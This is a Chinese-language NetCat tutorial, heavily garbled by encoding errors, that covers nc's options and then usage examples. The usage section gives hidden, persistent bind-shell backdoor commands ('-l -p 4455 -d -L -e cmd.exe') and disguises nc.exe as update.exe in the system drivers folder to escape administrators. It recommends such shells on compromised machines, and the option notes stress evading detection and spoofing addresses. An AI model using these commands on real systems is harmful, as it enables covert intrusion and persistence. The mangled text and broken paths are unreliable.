nc的全稱為NetCat,它能夠建立并接受傳輸控制協(xié)議（TCP)和用戶數(shù)據(jù)報(bào)協(xié)議(UDP)的連接，Netcat可在這些連接上讀寫(xiě)數(shù)據(jù)， 直到連接關(guān)閉為止。它可以通過(guò)手工或者腳本與應(yīng)用層的網(wǎng)絡(luò)應(yīng)用程序或服務(wù)進(jìn)行交互。從技術(shù)上來(lái)講，NetCat并不能產(chǎn)生UDP連接，因?yàn)閁DP是一種無(wú) 連接的協(xié)議。NetCat沒(méi)有圖形界面，很粗糙，很原始。

　　nc的命令行

　　nc的基本命令行形式是 nc [options] host ports,其中host是要掃描的主機(jī)名或IP地址，ports要么是一個(gè)單獨(dú)的端口，要么是一個(gè)端口范圍(用m-n的形式指定)，要么是一系列用空格隔開(kāi)的單個(gè)端口。

　　-d 只對(duì)Windows操作系統(tǒng)有用，該選項(xiàng)使NetCat以隱蔽模式工作，從而脫離MS-DOS命令提示符下環(huán)境運(yùn)行，使得nc不需要保持打開(kāi)命令窗口便可在監(jiān)聽(tīng)模式下運(yùn)行，也可以幫助黑客很好地隱藏監(jiān)聽(tīng)NetCat實(shí)例而不被系統(tǒng)管理員發(fā)現(xiàn)。

　　-e 如果NetCat使用gaping_security_hole選項(xiàng)進(jìn)行編譯，那么只要某人在NET后臺(tái)所監(jiān)聽(tīng)的任何端口上建立連接，該NetCat都將 執(zhí)行,且客戶端的NetCat會(huì)通過(guò)管道將I/O傳輸?shù)皆趧e處監(jiān)聽(tīng)的另一個(gè)NetCat實(shí)例中。使用這個(gè)選項(xiàng)非常危險(xiǎn)，除非你對(duì)nc相當(dāng)了解，起碼知道你 自己在做什么。這是在系統(tǒng)中建立后門(mén)shell的一個(gè)非?？旖萸胰菀椎姆椒?。

　　-i 延時(shí)間隔，表示在兩次數(shù)據(jù)發(fā)送之間nc等待的時(shí)間。例如：當(dāng)經(jīng)過(guò)管道傳輸一個(gè)文件到nc的時(shí)候，在傳輸輸入的下一行之前，nc將等待的秒數(shù)。當(dāng)使用nc對(duì) 一臺(tái)主機(jī)的多個(gè)端口之間進(jìn)行操作時(shí)，在切換到下一個(gè)端口之前，nc等待的秒數(shù)。這樣可以使黑客在進(jìn)行數(shù)據(jù)傳輸或?qū)σ粋€(gè)服務(wù)進(jìn)行攻擊的時(shí)候更加隱蔽，也可以 幫助你的端口掃描不被入侵檢測(cè)系統(tǒng)和系統(tǒng)管理員發(fā)現(xiàn)。

　　-g這個(gè)選項(xiàng)具有欺騙性。nc支持loose source routing（松散源路由）。你可以在命令行中指定多達(dá)8個(gè)-g選項(xiàng)來(lái)強(qiáng)迫nc流量經(jīng)過(guò)特定的IP地址，這在你為流量設(shè)置偽造的源IP地址時(shí)，可以利用 這個(gè)方法達(dá)到通過(guò)防火墻的過(guò)濾器或者允許訪問(wèn)主機(jī)列表，希望接收到從主機(jī)返回的響應(yīng)。

　　-G該選項(xiàng)讓用戶在-g選項(xiàng)所指定的路由列表中指定的一個(gè)地址作為當(dāng)前的下一路由，由于IP地址為4字節(jié)大?。↖PV4），所以這個(gè)參數(shù)總是4 字節(jié)的倍數(shù)；例如，4代表路由表中的第一個(gè)IP地址，8代表第二個(gè)IP地址，依次類推。這在偽造部分源路由表使得報(bào)文看起來(lái)相當(dāng)?shù)挠杏?。在進(jìn)行欺騙和源路 由時(shí)，這個(gè)功能有助于屏蔽你的位置，但也不一定能接收到響應(yīng)報(bào)文，因?yàn)轫憫?yīng)報(bào)文將經(jīng)過(guò)由偽造的IP地址反路由回來(lái)。

　　-l 該選項(xiàng)切換nc的監(jiān)聽(tīng)模式。此選項(xiàng)必須與-p選項(xiàng)一起使用以告訴nc綁定某個(gè)指定的TCP端口并等待到來(lái)的連接。若換成-u選項(xiàng)，則應(yīng)使用UDP端口而非TCP端口。

　　-L 該選項(xiàng)在Windows版本中有用，當(dāng)一個(gè)連接被關(guān)閉后，使用相同的命令行選項(xiàng)進(jìn)行重啟監(jiān)聽(tīng)模式，即使此時(shí)初始的連接已經(jīng)結(jié)束，nc也能在不需要用戶干涉的情況下接收后面新的連接。與-l一樣，必須與-p同時(shí)使用。

　　-n 該選項(xiàng)告訴我們nc不做任何主機(jī)名查找的工作。

　　-0對(duì)數(shù)據(jù)執(zhí)行一次十六進(jìn)制轉(zhuǎn)儲(chǔ)（hex dump ）并將其存儲(chǔ)在hexfile中。命令nc-o hexfile將把雙向通信的數(shù)據(jù)記錄下來(lái)，在每行的開(kāi)始處會(huì)有一個(gè)“<"或">”用來(lái)分別指示是進(jìn)入數(shù)據(jù)還是外出數(shù)據(jù)。如果只想得到對(duì)進(jìn)入 數(shù)據(jù)的十六進(jìn)制轉(zhuǎn)儲(chǔ)，可以使用 nc -ohexfile命令。

　　-p 讓用戶指定一個(gè)nc應(yīng)使用的本地端口號(hào)。當(dāng)通過(guò)-l或-L選項(xiàng)來(lái)使用監(jiān)聽(tīng)模式的時(shí)候，這個(gè)參數(shù)是必需的。如果沒(méi)有為外出連接指定這個(gè)參數(shù)，則與大多數(shù)其他TCP或UDP客戶程序的做法一樣，nc將使用系統(tǒng)分配給他的任何端口。

　　-r 該參數(shù)使nc可以隨機(jī)選擇本地和遠(yuǎn)程端口。當(dāng)使用nc在系統(tǒng)中范圍很大的一批端口上獲取信息時(shí)，要想混合源端口和目標(biāo)端口的順序看起來(lái)不怎么象端口掃描， 這個(gè)選項(xiàng)是很有用的。當(dāng)這個(gè)選項(xiàng)與-i選項(xiàng)和一個(gè)足夠大的間隔結(jié)合使用的時(shí)候，在不被注意的端口掃描成功幾率能得到很大提升。

　　-s 指定nc建立連接時(shí)所使用的IP地址，該選項(xiàng)允許黑客做一些工作，它允許黑客隱藏他們的IP地址或假冒他人的IP地址，但是要得到路由到他們所欺騙的地址 的任何信息，都需要使用-g源路由選項(xiàng)。其次，當(dāng)處于監(jiān)聽(tīng)模式時(shí)，大多數(shù)情況下都可以與一個(gè)已經(jīng)監(jiān)聽(tīng)的服務(wù)“預(yù)先綁定”，所有TCP和UDP服務(wù)都綁定到 某個(gè)端口。

　　-t 如果使用telnet選項(xiàng)編譯，nc就可以與telnet服務(wù)器進(jìn)行telnet選項(xiàng)協(xié)商，雖然它的響應(yīng)是毫無(wú)意義的信息，但可以通過(guò)該狀態(tài)看到連接23端口的信息。

　　-u nc使用UDP而非TCP，在客戶模式和監(jiān)聽(tīng)模式下都起作用。

　　-v 控制nc將要做的事情達(dá)到的程度，如使用nc -v，那么nc將僅吐出它所接收到的數(shù)據(jù)，一個(gè)單獨(dú)的-v可以知道它連接或綁定的地址是否有問(wèn)題發(fā)生，第2個(gè)-v可以讓nc在一個(gè)連接結(jié)束的時(shí)候讓你知道這個(gè)連接總共發(fā)送和接收了多少數(shù)據(jù)。

　　-w控制在一個(gè)連接上nc放棄之前等待的時(shí)間。同時(shí)也告訴nc當(dāng)在標(biāo)準(zhǔn)輸入上接收到一個(gè)eof（end-of-file）之后應(yīng)該等待多長(zhǎng)時(shí)間 來(lái)關(guān)閉連接并退出。如果你通過(guò)nc向遠(yuǎn)程服務(wù)器發(fā)送命令并且期望大量的數(shù)據(jù)返回（例如：向一臺(tái)web服務(wù)器發(fā)送一個(gè)http命令以下載一個(gè)大文件），該選 項(xiàng)是很有用的。

　　nc的具體使用

　　c:nc.exe -l -p 4455 -d -e cmd.exe 可以很好的隱藏一個(gè)NetCat后門(mén)。

　　c:nc.exe -p 4455 -d -L -e cmd.exe 這個(gè)命令可以讓黑客利用NetCat重新返回系統(tǒng)，直到系統(tǒng)管理員在任務(wù)管理器中看見(jiàn)nc.exe在運(yùn)行，從而發(fā)現(xiàn)這個(gè)后門(mén)，我們一樣可以把它做的更加隱蔽，

　　c:move nc.exe c:windowssystem32Driversupdate.exe

　　c:windowssysteme32driversupdate.exe -p 4455 -d -L -e cmd.exe

　　系統(tǒng)管理員可能把特權(quán)附屬于一些無(wú)害的程序，如update.exe等，黑客也可以隱藏命令行。

　　c:windowssystme32driversupdate.exe

　　cmd line: -l -p 4455 -d -L -e cmd.exe

　　c:>

　　nc -l - p 80 監(jiān)聽(tīng)80端口

　　nc -l -p 80 >c:log.dat 監(jiān)聽(tīng)80端口，并把信息記錄到log.dat中

　　nc -v -l -p 80 監(jiān)聽(tīng)80端口，并顯示端口信息

　　nc -vv -l -p 80 監(jiān)聽(tīng)80端口，顯示更詳細(xì)的端口信息

　　nc -l -p 80 -t -e cmd.exe監(jiān)聽(tīng)本地的80端口的入站信息，同時(shí)將cmd.exe重定向到80端口，當(dāng)有人連接的時(shí)候，就讓cmd.exe以telnet的形式應(yīng)答。當(dāng)然這個(gè)最好用在控制的肉雞上。

　　nc -v ip port 掃瞄某IP的某個(gè)端口

　　nc -v -z ip port-port掃描某IP的端口到某端口

　　nc -v -z -u ip port-port掃描某IP的某UDP端口到某UDP端口